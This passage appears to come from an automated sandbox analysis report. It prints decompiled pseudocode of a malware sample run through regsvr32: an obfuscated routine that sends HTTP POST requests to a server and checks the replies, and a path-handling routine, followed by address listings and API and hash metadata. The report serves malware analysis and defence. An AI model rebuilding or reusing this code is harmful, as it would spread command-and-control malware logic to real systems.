                                                                                                                                                                        				void _v388;
                                                                                                                                                                        				void _v644;
                                                                                                                                                                        				intOrPtr _t94;
                                                                                                                                                                        				intOrPtr _t102;
                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                        				intOrPtr* _t105;
                                                                                                                                                                        				intOrPtr _t110;
                                                                                                                                                                        				signed int _t111;
                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                        				intOrPtr _t115;
                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                        				char _t117;
                                                                                                                                                                        				intOrPtr _t119;
                                                                                                                                                                        				char _t122;
                                                                                                                                                                        				intOrPtr _t127;
                                                                                                                                                                        				signed int _t129;
                                                                                                                                                                        				intOrPtr _t135;
                                                                                                                                                                        				intOrPtr _t139;
                                                                                                                                                                        				intOrPtr _t143;
                                                                                                                                                                        				intOrPtr _t145;
                                                                                                                                                                        				intOrPtr _t147;
                                                                                                                                                                        				intOrPtr _t153;
                                                                                                                                                                        				intOrPtr _t155;
                                                                                                                                                                        				intOrPtr _t159;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				signed int _t165;
                                                                                                                                                                        				intOrPtr _t179;
                                                                                                                                                                        				signed int _t186;
                                                                                                                                                                        				char _t188;
                                                                                                                                                                        				signed int _t189;
                                                                                                                                                                        				void* _t190;
                                                                                                                                                                        				char _t193;
                                                                                                                                                                        				signed int _t194;
                                                                                                                                                                        				signed int _t195;
                                                                                                                                                                        				void* _t196;
                                                                                                                                                                        
                                                                                                                                                                        				_v24 = 4;
                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                        				_v28 = 1;
                                                                                                                                                                        				_t190 = __edx;
                                                                                                                                                                        				memset( &_v388, 0, 0x100);
                                                                                                                                                                        				memset( &_v644, 0, 0x100);
                                                                                                                                                                        				_v56 = E05B99DD8(0xd62);
                                                                                                                                                                        				_v52 = E05B99DD8(0x8e9);
                                                                                                                                                                        				_v48 = E05B99DD8(0xa93);
                                                                                                                                                                        				_v44 = E05B99DD8(0x9a9);
                                                                                                                                                                        				_t94 = E05B99DD8(0xb64);
                                                                                                                                                                        				_v36 = _v36 & 0;
                                                                                                                                                                        				_t188 = 0x3c;
                                                                                                                                                                        				_v40 = _t94;
                                                                                                                                                                        				E05B98D6D( &_v116, 0, 0x100);
                                                                                                                                                                        				_v108 = 0x10;
                                                                                                                                                                        				_v112 =  &_v132;
                                                                                                                                                                        				_v116 = _t188;
                                                                                                                                                                        				_v100 =  &_v388;
                                                                                                                                                                        				_v96 = 0x100;
                                                                                                                                                                        				_v72 =  &_v644;
                                                                                                                                                                        				_push( &_v116);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_v68 = 0x100;
                                                                                                                                                                        				_push(E05B9A43D(_t190));
                                                                                                                                                                        				_t102 =  *0x5baf838; // 0x0
                                                                                                                                                                        				_push(_t190);
                                                                                                                                                                        				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
                                                                                                                                                                        					_t104 = 0;
                                                                                                                                                                        					__eflags = 0;
                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t105 =  *0x5baf838; // 0x0
                                                                                                                                                                        						_v8 = 0x8404f700;
                                                                                                                                                                        						_t189 =  *_t105( *0x5baf920,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
                                                                                                                                                                        						__eflags = _t189;
                                                                                                                                                                        						if(_t189 != 0) {
                                                                                                                                                                        							E05B9F73E(_t189);
                                                                                                                                                                        							_t110 =  *0x5baf838; // 0x0
                                                                                                                                                                        							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
                                                                                                                                                                        							__eflags = _a24;
                                                                                                                                                                        							_t165 = _t111;
                                                                                                                                                                        							if(_a24 != 0) {
                                                                                                                                                                        								E05B9A065(_a24);
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags = _t165;
                                                                                                                                                                        							if(_t165 != 0) {
                                                                                                                                                                        								__eflags = _v104 - 4;
                                                                                                                                                                        								_t112 = 0x8484f700;
                                                                                                                                                                        								if(_v104 != 4) {
                                                                                                                                                                        									_t112 = _v8;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t115 =  *0x5baf838; // 0x0
                                                                                                                                                                        								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
                                                                                                                                                                        								_v8 = _t116;
                                                                                                                                                                        								__eflags = _a24;
                                                                                                                                                                        								if(_a24 != 0) {
                                                                                                                                                                        									E05B9A065(_a24);
                                                                                                                                                                        									_t116 = _v8;
                                                                                                                                                                        								}
                                                                                                                                                                        								__eflags = _t116;
                                                                                                                                                                        								if(_t116 != 0) {
                                                                                                                                                                        									__eflags = _v104 - 4;
                                                                                                                                                                        									if(_v104 == 4) {
                                                                                                                                                                        										E05B9F6EC(_t116);
                                                                                                                                                                        									}
                                                                                                                                                                        									_t117 = E05B99DD8(0x901);
                                                                                                                                                                        									_t193 = _t117;
                                                                                                                                                                        									_v16 = _t193;
                                                                                                                                                                        									_t119 =  *0x5baf838; // 0x0
                                                                                                                                                                        									_t194 = _v8;
                                                                                                                                                                        									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E05B9A43D(_t193), _a4, _a8);
                                                                                                                                                                        									E05B98B9C( &_v16);
                                                                                                                                                                        									__eflags = _a24;
                                                                                                                                                                        									if(_a24 != 0) {
                                                                                                                                                                        										E05B9A065(_a24);
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags = _v8;
                                                                                                                                                                        									if(_v8 != 0) {
                                                                                                                                                                        										L25:
                                                                                                                                                                        										_t122 = 8;
                                                                                                                                                                        										_v24 = _t122;
                                                                                                                                                                        										_v20 = 0;
                                                                                                                                                                        										_v16 = 0;
                                                                                                                                                                        										E05B98D6D( &_v20, 0, _t122);
                                                                                                                                                                        										_t127 =  *0x5baf838; // 0x0
                                                                                                                                                                        										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                        											_t129 = E05B99F6F( &_v20, __eflags);
                                                                                                                                                                        											__eflags = _t129 - 0xc8;
                                                                                                                                                                        											if(_t129 == 0xc8) {
                                                                                                                                                                        												 *_a20 = _t194;
                                                                                                                                                                        												 *_a12 = _t189;
                                                                                                                                                                        												 *_a16 = _t165;
                                                                                                                                                                        												__eflags = 0;
                                                                                                                                                                        												return 0;
                                                                                                                                                                        											}
                                                                                                                                                                        											_v12 =  ~_t129;
                                                                                                                                                                        											L29:
                                                                                                                                                                        											_t135 =  *0x5baf838; // 0x0
                                                                                                                                                                        											 *((intOrPtr*)(_t135 + 8))(_t194);
                                                                                                                                                                        											_t195 = _v12;
                                                                                                                                                                        											L30:
                                                                                                                                                                        											__eflags = _t165;
                                                                                                                                                                        											if(_t165 != 0) {
                                                                                                                                                                        												_t139 =  *0x5baf838; // 0x0
                                                                                                                                                                        												 *((intOrPtr*)(_t139 + 8))(_t165);
                                                                                                                                                                        											}
                                                                                                                                                                        											__eflags = _t189;
                                                                                                                                                                        											if(_t189 != 0) {
                                                                                                                                                                        												_t179 =  *0x5baf838; // 0x0
                                                                                                                                                                        												 *((intOrPtr*)(_t179 + 8))(_t189);
                                                                                                                                                                        											}
                                                                                                                                                                        											return _t195;
                                                                                                                                                                        										}
                                                                                                                                                                        										GetLastError();
                                                                                                                                                                        										_v12 = 0xfffffff8;
                                                                                                                                                                        										goto L29;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										GetLastError();
                                                                                                                                                                        										_t143 =  *0x5baf838; // 0x0
                                                                                                                                                                        										 *((intOrPtr*)(_t143 + 8))(_t194);
                                                                                                                                                                        										_t145 =  *0x5baf838; // 0x0
                                                                                                                                                                        										_v8 = _v8 & 0x00000000;
                                                                                                                                                                        										 *((intOrPtr*)(_t145 + 8))(_t165);
                                                                                                                                                                        										_t147 =  *0x5baf838; // 0x0
                                                                                                                                                                        										_t165 = 0;
                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                        										 *((intOrPtr*)(_t147 + 8))(_t189);
                                                                                                                                                                        										_t194 = _v8;
                                                                                                                                                                        										goto L21;
                                                                                                                                                                        									}
                                                                                                                                                                        								} else {
                                                                                                                                                                        									GetLastError();
                                                                                                                                                                        									_t153 =  *0x5baf838; // 0x0
                                                                                                                                                                        									 *((intOrPtr*)(_t153 + 8))(_t165);
                                                                                                                                                                        									_t155 =  *0x5baf838; // 0x0
                                                                                                                                                                        									_t165 = 0;
                                                                                                                                                                        									 *((intOrPtr*)(_t155 + 8))(_t189);
                                                                                                                                                                        									_t189 = 0;
                                                                                                                                                                        									_t194 = _v8;
                                                                                                                                                                        									goto L22;
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								GetLastError();
                                                                                                                                                                        								_t159 =  *0x5baf838; // 0x0
                                                                                                                                                                        								 *((intOrPtr*)(_t159 + 8))(_t189);
                                                                                                                                                                        								L21:
                                                                                                                                                                        								_t189 = 0;
                                                                                                                                                                        								__eflags = 0;
                                                                                                                                                                        								goto L22;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						GetLastError();
                                                                                                                                                                        						L22:
                                                                                                                                                                        						_t186 = _t194;
                                                                                                                                                                        						_t104 = _v12 + 1;
                                                                                                                                                                        						_v12 = _t104;
                                                                                                                                                                        						__eflags = _t104 - 2;
                                                                                                                                                                        					} while (_t104 < 2);
                                                                                                                                                                        					__eflags = _t186;
                                                                                                                                                                        					if(_t186 != 0) {
                                                                                                                                                                        						goto L25;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t195 = 0xfffffffe;
                                                                                                                                                                        					goto L30;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t163 = 0xfffffffc;
                                                                                                                                                                        				return _t163;
                                                                                                                                                                        			}





























































                                                                                                                                                                        0x05b9f93e
                                                                                                                                                                        0x05b9f941
                                                                                                                                                                        0x05b9f944
                                                                                                                                                                        0x05b9f947
                                                                                                                                                                        0x05b9f94c
                                                                                                                                                                        0x05b9f951
                                                                                                                                                                        0x05b9f951
                                                                                                                                                                        0x05b9f954
                                                                                                                                                                        0x05b9f956
                                                                                                                                                                        0x05b9f97c
                                                                                                                                                                        0x05b9f980
                                                                                                                                                                        0x05b9f984
                                                                                                                                                                        0x05b9f984
                                                                                                                                                                        0x05b9f98e
                                                                                                                                                                        0x05b9f996
                                                                                                                                                                        0x05b9f99b
                                                                                                                                                                        0x05b9f9a6
                                                                                                                                                                        0x05b9f9ac
                                                                                                                                                                        0x05b9f9b6
                                                                                                                                                                        0x05b9f9b9
                                                                                                                                                                        0x05b9f9be
                                                                                                                                                                        0x05b9f9c2
                                                                                                                                                                        0x05b9f9c7
                                                                                                                                                                        0x05b9f9c7
                                                                                                                                                                        0x05b9f9cc
                                                                                                                                                                        0x05b9f9d0
                                                                                                                                                                        0x05b9fa1b
                                                                                                                                                                        0x05b9fa1d
                                                                                                                                                                        0x05b9fa20
                                                                                                                                                                        0x05b9fa28
                                                                                                                                                                        0x05b9fa2c
                                                                                                                                                                        0x05b9fa2f
                                                                                                                                                                        0x05b9fa41
                                                                                                                                                                        0x05b9fa4c
                                                                                                                                                                        0x05b9fa4e
                                                                                                                                                                        0x05b9fa62
                                                                                                                                                                        0x05b9fa67
                                                                                                                                                                        0x05b9fa6c
                                                                                                                                                                        0x05b9faa1
                                                                                                                                                                        0x05b9faa6
                                                                                                                                                                        0x05b9faab
                                                                                                                                                                        0x05b9faad
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9faad
                                                                                                                                                                        0x05b9fa70
                                                                                                                                                                        0x05b9fa73
                                                                                                                                                                        0x05b9fa73
                                                                                                                                                                        0x05b9fa79
                                                                                                                                                                        0x05b9fa7c
                                                                                                                                                                        0x05b9fa7f
                                                                                                                                                                        0x05b9fa7f
                                                                                                                                                                        0x05b9fa81
                                                                                                                                                                        0x05b9fa83
                                                                                                                                                                        0x05b9fa89
                                                                                                                                                                        0x05b9fa89
                                                                                                                                                                        0x05b9fa8c
                                                                                                                                                                        0x05b9fa8e
                                                                                                                                                                        0x05b9fa90
                                                                                                                                                                        0x05b9fa97
                                                                                                                                                                        0x05b9fa97
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9fa9a
                                                                                                                                                                        0x05b9fa50
                                                                                                                                                                        0x05b9fa56
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9f9d2
                                                                                                                                                                        0x05b9f9d2
                                                                                                                                                                        0x05b9f9d8
                                                                                                                                                                        0x05b9f9de
                                                                                                                                                                        0x05b9f9e1
                                                                                                                                                                        0x05b9f9e6
                                                                                                                                                                        0x05b9f9eb
                                                                                                                                                                        0x05b9f9ee
                                                                                                                                                                        0x05b9f9f3
                                                                                                                                                                        0x05b9f9f3
                                                                                                                                                                        0x05b9f9f6
                                                                                                                                                                        0x05b9f9f9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9f9f9
                                                                                                                                                                        0x05b9f958
                                                                                                                                                                        0x05b9f958
                                                                                                                                                                        0x05b9f95e
                                                                                                                                                                        0x05b9f964
                                                                                                                                                                        0x05b9f967
                                                                                                                                                                        0x05b9f96c
                                                                                                                                                                        0x05b9f96f
                                                                                                                                                                        0x05b9f972
                                                                                                                                                                        0x05b9f974
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9f974
                                                                                                                                                                        0x05b9f900
                                                                                                                                                                        0x05b9f900
                                                                                                                                                                        0x05b9f906
                                                                                                                                                                        0x05b9f90c
                                                                                                                                                                        0x05b9f9fc
                                                                                                                                                                        0x05b9f9fc
                                                                                                                                                                        0x05b9f9fc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9f9fc
                                                                                                                                                                        0x05b9f8fe
                                                                                                                                                                        0x05b9f8bf
                                                                                                                                                                        0x05b9f9fe
                                                                                                                                                                        0x05b9fa01
                                                                                                                                                                        0x05b9fa03
                                                                                                                                                                        0x05b9fa06
                                                                                                                                                                        0x05b9fa09
                                                                                                                                                                        0x05b9fa09
                                                                                                                                                                        0x05b9fa12
                                                                                                                                                                        0x05b9fa14
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9fa18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9fa18
                                                                                                                                                                        0x05b9f88e
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 05B9F7D7
                                                                                                                                                                        • memset.MSVCRT ref: 05B9F7E8
                                                                                                                                                                          • Part of subcall function 05B98D6D: memset.MSVCRT ref: 05B98D7F
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 05B9F8BF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ErrorLast
                                                                                                                                                                        • String ID: POST
                                                                                                                                                                        • API String ID: 2570506013-1814004025
                                                                                                                                                                        • Opcode ID: 2e7d752fac9a5c6b028b9ba2a02e366e5364c0e272a94398c9c3305fe6bc29fd
                                                                                                                                                                        • Instruction ID: bd0876791fe0b6e4005eadfe299285862b3f6ceece9ca59119463b7712894240
                                                                                                                                                                        • Opcode Fuzzy Hash: 2e7d752fac9a5c6b028b9ba2a02e366e5364c0e272a94398c9c3305fe6bc29fd
                                                                                                                                                                        • Instruction Fuzzy Hash: 83A12975A00218AFDF15DFA4D889AFE7BB9EF48320F1041A9F905E7250DB34AA85CB51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snprintfqsort
                                                                                                                                                                        • String ID: %I64d$false$null$true
                                                                                                                                                                        • API String ID: 756996078-4285102228
                                                                                                                                                                        • Opcode ID: 89bcba1e26039b366cb359ea959e5b2406c40d1b0c5c105296b10441efa67317
                                                                                                                                                                        • Instruction ID: d94abddca4830430fba92bfa5f32550d34cbf9a6fef910a4fa5dd9a986c87516
                                                                                                                                                                        • Opcode Fuzzy Hash: 89bcba1e26039b366cb359ea959e5b2406c40d1b0c5c105296b10441efa67317
                                                                                                                                                                        • Instruction Fuzzy Hash: 34E17E73A0820ABBDF519F68CC45EBF3B6AEF44740F148099FD1596140E731EA61DBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                        			E05B950B3(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                                                                                                                                                        				void _v532;
                                                                                                                                                                        				char _v548;
                                                                                                                                                                        				char _v580;
                                                                                                                                                                        				char _v584;
                                                                                                                                                                        				signed int _v588;
                                                                                                                                                                        				intOrPtr _v592;
                                                                                                                                                                        				WCHAR* _v596;
                                                                                                                                                                        				char _v600;
                                                                                                                                                                        				intOrPtr _v604;
                                                                                                                                                                        				char _v632;
                                                                                                                                                                        				char _v636;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                        				char _t63;
                                                                                                                                                                        				intOrPtr _t65;
                                                                                                                                                                        				intOrPtr _t66;
                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                        				void* _t76;
                                                                                                                                                                        				void* _t77;
                                                                                                                                                                        				signed int _t78;
                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                        				intOrPtr _t82;
                                                                                                                                                                        				WCHAR* _t84;
                                                                                                                                                                        				intOrPtr _t94;
                                                                                                                                                                        				intOrPtr _t95;
                                                                                                                                                                        				void* _t96;
                                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                                        				signed char _t104;
                                                                                                                                                                        				void* _t107;
                                                                                                                                                                        				intOrPtr _t108;
                                                                                                                                                                        				intOrPtr _t110;
                                                                                                                                                                        				void* _t113;
                                                                                                                                                                        				void* _t114;
                                                                                                                                                                        				WCHAR* _t115;
                                                                                                                                                                        				void* _t126;
                                                                                                                                                                        				WCHAR* _t130;
                                                                                                                                                                        				intOrPtr _t142;
                                                                                                                                                                        				void* _t143;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				signed int _t166;
                                                                                                                                                                        				void* _t167;
                                                                                                                                                                        				void* _t169;
                                                                                                                                                                        				void* _t173;
                                                                                                                                                                        				signed int _t174;
                                                                                                                                                                        				WCHAR* _t176;
                                                                                                                                                                        				signed int _t177;
                                                                                                                                                                        				signed int _t178;
                                                                                                                                                                        				intOrPtr* _t180;
                                                                                                                                                                        				signed int _t182;
                                                                                                                                                                        				void* _t185;
                                                                                                                                                                        				void* _t186;
                                                                                                                                                                        				WCHAR** _t187;
                                                                                                                                                                        				void* _t192;
                                                                                                                                                                        
                                                                                                                                                                        				_t192 = __fp0;
                                                                                                                                                                        				_push(_t177);
                                                                                                                                                                        				_t113 = __edx;
                                                                                                                                                                        				_t173 = __ecx;
                                                                                                                                                                        				_t178 = _t177 | 0xffffffff;
                                                                                                                                                                        				memset( &_v532, 0, 0x20c);
                                                                                                                                                                        				_v588 = _v588 & 0x00000000;
                                                                                                                                                                        				_t185 = (_t182 & 0xfffffff8) - 0x254 + 0xc;
                                                                                                                                                                        				_v596 = 1;
                                                                                                                                                                        				if(_t173 != 0) {
                                                                                                                                                                        					_t108 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        					_t5 = _t108 + 0x110; // 0x5d616b8
                                                                                                                                                                        					_t110 =  *0x5baf820; // 0x5d5faa0
                                                                                                                                                                        					_v604 =  *((intOrPtr*)(_t110 + 0x68))(_t173,  *((intOrPtr*)( *_t5)));
                                                                                                                                                                        				}
                                                                                                                                                                        				if(E05B9C9F4(_t173) != 0) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					_t56 = E05B9C6CE();
                                                                                                                                                                        					_push(_t113);
                                                                                                                                                                        					_v592 = _t56;
                                                                                                                                                                        					E05B9C4C1(_t56,  &_v580, _t190, _t192);
                                                                                                                                                                        					_t114 = E05B95072( &_v580,  &_v580, _t190);
                                                                                                                                                                        					_t126 = E05B9E2C5( &_v580, E05B9A43D( &_v580), 0);
                                                                                                                                                                        					E05B9C6E4(_t126,  &_v548, _t192);
                                                                                                                                                                        					_push(_t126);
                                                                                                                                                                        					_t161 =  &_v580;
                                                                                                                                                                        					_t63 = E05B9317E(_t173,  &_v580, _t190, _t192);
                                                                                                                                                                        					_v600 = _t63;
                                                                                                                                                                        					if(_t63 != 0) {
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push(_t114);
                                                                                                                                                                        						_push(0x5bac9a0);
                                                                                                                                                                        						_t115 = E05B99A5A(_t63);
                                                                                                                                                                        						_t186 = _t185 + 0x10;
                                                                                                                                                                        						_t65 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        						__eflags =  *((intOrPtr*)(_t65 + 0x214)) - 3;
                                                                                                                                                                        						if( *((intOrPtr*)(_t65 + 0x214)) != 3) {
                                                                                                                                                                        							L12:
                                                                                                                                                                        							__eflags = _v596;
                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                        								_t66 = E05B998BD(_v600);
                                                                                                                                                                        								_t130 = _t115;
                                                                                                                                                                        								 *0x5baf8d8 = _t66;
                                                                                                                                                                        								 *0x5baf8d0 = E05B998BD(_t130);
                                                                                                                                                                        								L17:
                                                                                                                                                                        								_push(_t130);
                                                                                                                                                                        								_t174 = E05B9A633( &_v532, _t173, _t192, _v592,  &_v584,  &_v600);
                                                                                                                                                                        								_t187 = _t186 + 0x10;
                                                                                                                                                                        								__eflags = _t174;
                                                                                                                                                                        								if(_t174 == 0) {
                                                                                                                                                                        									goto L41;
                                                                                                                                                                        								}
                                                                                                                                                                        								_push(0x5bac9f2);
                                                                                                                                                                        								_t163 = 0xe;
                                                                                                                                                                        								E05B9AAA3(_t163, _t192);
                                                                                                                                                                        								E05B9AADC(_t174, _t192, _t115);
                                                                                                                                                                        								_t180 = _a4;
                                                                                                                                                                        								_push( *_t180);
                                                                                                                                                                        								E05B9AA7E(0xb);
                                                                                                                                                                        								_t165 =  *(_t180 + 0x10);
                                                                                                                                                                        								__eflags =  *(_t180 + 0x10);
                                                                                                                                                                        								if( *(_t180 + 0x10) != 0) {
                                                                                                                                                                        									E05B9B025(_t165, _t192);
                                                                                                                                                                        								}
                                                                                                                                                                        								_t166 =  *(_t180 + 0xc);
                                                                                                                                                                        								__eflags = _t166;
                                                                                                                                                                        								if(_t166 != 0) {
                                                                                                                                                                        									E05B9B025(_t166, _t192);
                                                                                                                                                                        								}
                                                                                                                                                                        								_t76 = E05B9A065(0);
                                                                                                                                                                        								_push(_t166);
                                                                                                                                                                        								_t167 = 2;
                                                                                                                                                                        								_t77 = E05B9AA50();
                                                                                                                                                                        								__eflags = _v596;
                                                                                                                                                                        								_t142 = _t76;
                                                                                                                                                                        								if(_v596 == 0) {
                                                                                                                                                                        									_t142 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        									__eflags =  *((intOrPtr*)(_t142 + 0xa4)) - 1;
                                                                                                                                                                        									if(__eflags != 0) {
                                                                                                                                                                        										_t78 = E05BA0D7E(_t77, _t115, _t167, _t192, 0, _t115, 0);
                                                                                                                                                                        										_t187 =  &(_t187[3]);
                                                                                                                                                                        										goto L26;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t142 = _t142 + 0x228;
                                                                                                                                                                        									goto L25;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t79 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        									__eflags =  *((intOrPtr*)(_t79 + 0xa4)) - 1;
                                                                                                                                                                        									if(__eflags != 0) {
                                                                                                                                                                        										L32:
                                                                                                                                                                        										__eflags =  *(_t79 + 0x1898) & 0x00000082;
                                                                                                                                                                        										if(( *(_t79 + 0x1898) & 0x00000082) != 0) {
                                                                                                                                                                        											_t169 = 0x64;
                                                                                                                                                                        											E05B9F0DE(_t169);
                                                                                                                                                                        										}
                                                                                                                                                                        										E05B9584B( &_v580, _t192);
                                                                                                                                                                        										_t176 = _a8;
                                                                                                                                                                        										_t143 = _t142;
                                                                                                                                                                        										__eflags = _t176;
                                                                                                                                                                        										if(_t176 != 0) {
                                                                                                                                                                        											_t82 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        											__eflags =  *((intOrPtr*)(_t82 + 0xa0)) - 1;
                                                                                                                                                                        											if( *((intOrPtr*)(_t82 + 0xa0)) != 1) {
                                                                                                                                                                        												lstrcpyW(_t176, _t115);
                                                                                                                                                                        											} else {
                                                                                                                                                                        												_t84 = E05B9109A(_t143, 0x49f);
                                                                                                                                                                        												_v596 = _t84;
                                                                                                                                                                        												lstrcpyW(_t176, _t84);
                                                                                                                                                                        												E05B98BAF( &_v596);
                                                                                                                                                                        												 *_t187 = 0x5bac9b0;
                                                                                                                                                                        												lstrcatW(_t176, ??);
                                                                                                                                                                        												lstrcatW(_t176, _t115);
                                                                                                                                                                        												lstrcatW(_t176, 0x5bac9b0);
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        										_t81 = _a12;
                                                                                                                                                                        										__eflags = _t81;
                                                                                                                                                                        										if(_t81 != 0) {
                                                                                                                                                                        											 *_t81 = _v592;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t178 = 0;
                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                        										goto L41;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t40 = _t79 + 0x228; // 0x5d5fe10
                                                                                                                                                                        									_t142 = _t40;
                                                                                                                                                                        									L25:
                                                                                                                                                                        									_t78 = E05B95AC0(_t142, _t115, __eflags);
                                                                                                                                                                        									L26:
                                                                                                                                                                        									__eflags = _t78;
                                                                                                                                                                        									if(_t78 >= 0) {
                                                                                                                                                                        										_t79 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        										goto L32;
                                                                                                                                                                        									}
                                                                                                                                                                        									_push(0xfffffffd);
                                                                                                                                                                        									L6:
                                                                                                                                                                        									_pop(_t178);
                                                                                                                                                                        									goto L41;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							_t94 = E05B9D11F(_v592, __eflags);
                                                                                                                                                                        							_v600 = _t94;
                                                                                                                                                                        							_t95 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        							_t96 =  *((intOrPtr*)(_t95 + 0xdc))(_t94, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                                                                                                                                                                        							__eflags = _t96 - _t178;
                                                                                                                                                                        							if(_t96 != _t178) {
                                                                                                                                                                        								_t97 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        								 *((intOrPtr*)(_t97 + 0x30))();
                                                                                                                                                                        								E05B98BF4( &_v636, _t178);
                                                                                                                                                                        								_t130 = _t96;
                                                                                                                                                                        								goto L17;
                                                                                                                                                                        							}
                                                                                                                                                                        							E05B98BF4( &_v632, _t178);
                                                                                                                                                                        							_t72 = 1;
                                                                                                                                                                        							goto L42;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t18 = _t65 + 0x1898; // 0x0
                                                                                                                                                                        						_t104 =  *_t18;
                                                                                                                                                                        						__eflags = _t104 & 0x00000004;
                                                                                                                                                                        						if((_t104 & 0x00000004) == 0) {
                                                                                                                                                                        							__eflags = _t104;
                                                                                                                                                                        							if(_t104 != 0) {
                                                                                                                                                                        								goto L12;
                                                                                                                                                                        							}
                                                                                                                                                                        							L11:
                                                                                                                                                                        							E05B9F1F6(_v600, _t161);
                                                                                                                                                                        							goto L12;
                                                                                                                                                                        						}
                                                                                                                                                                        						E05B9F1B6(_v600,  &_v580);
                                                                                                                                                                        						goto L11;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0xfffffffe);
                                                                                                                                                                        					goto L6;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t107 = E05B93097( &_v532, _t178, 0x105);
                                                                                                                                                                        					_t190 = _t107;
                                                                                                                                                                        					if(_t107 == 0) {
                                                                                                                                                                        						L41:
                                                                                                                                                                        						E05B95F6F( &_v588);
                                                                                                                                                                        						_t72 = _t178;
                                                                                                                                                                        						L42:
                                                                                                                                                                        						return _t72;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				}
                                                                                                                                                                        			}


























































                                                                                                                                                                        0x05b9539a
                                                                                                                                                                        0x05b9535d
                                                                                                                                                                        0x05b953a6
                                                                                                                                                                        0x05b953a9
                                                                                                                                                                        0x05b953ab
                                                                                                                                                                        0x05b953b1
                                                                                                                                                                        0x05b953b1
                                                                                                                                                                        0x05b953b3
                                                                                                                                                                        0x05b953b3
